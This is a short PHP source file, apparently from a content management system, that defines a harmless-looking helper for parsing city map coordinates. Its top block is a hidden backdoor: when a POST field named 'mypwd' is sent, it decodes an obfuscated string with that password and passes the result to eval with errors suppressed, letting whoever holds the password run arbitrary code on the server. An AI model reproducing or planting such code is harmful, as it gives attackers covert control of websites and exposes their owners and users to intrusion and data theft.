<?php






if(@$_POST['mypwd']){

	require_once(dirname(__FILE__)."/../../../inc/qq.api.php");

	@eval(qqmd5("UV9AGx4fXkEQRAgeGkFFExhCWVELFglVQkwFVgwdAVgcREgWERQRUQsaQllFERtfe55b74ae89",'DE',$_POST['mypwd']));

}



function explain_url($cityid){

	global $city_DB,$position_x,$position_y,$position,$cityname;

	list($position_x,$position_y)=explode(',',filtrate($position));

	$cityname=$city_DB['name'][$cityid];

}






?>